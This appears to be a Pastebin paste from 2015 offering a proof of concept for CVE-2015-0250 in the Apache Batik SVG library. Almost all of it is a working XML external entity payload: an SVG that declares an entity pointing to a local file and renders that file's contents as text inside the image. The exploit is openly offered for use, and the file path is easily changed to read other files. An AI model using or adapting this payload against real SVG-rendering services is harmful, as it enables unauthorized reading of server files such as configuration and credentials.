Advertisement
Guest User

An efficient PoC for Batik CVE-2015-0250

a guest
Mar 21st, 2015
1,272
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
XML 0.54 KB | None | 0 0
  1. <!DOCTYPE svg [
  2.     <!ENTITY xxe SYSTEM "file:///tmp/pattern_create.txt">
  3. ]>
  4. <svg width="1366px" height="768px" viewBox="0 0 1366 768" version="1.2" xmlns="http://www.w3.org/2000/svg" style="fill:black">
  5.       <rect x="0" y="0" width="1366" height="768" style="fill:white"/>
  6.       <flowRoot font-size="25">
  7.          <flowRegion>
  8.            <rect x="20" y="20" width="1326" height="728" style="fill:black;opacity:0.1"/>
  9.          </flowRegion>
  10.          <flowDiv>
  11.             <flowPara>&xxe;</flowPara>
  12.          </flowDiv>
  13.       </flowRoot>
  14. </svg>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement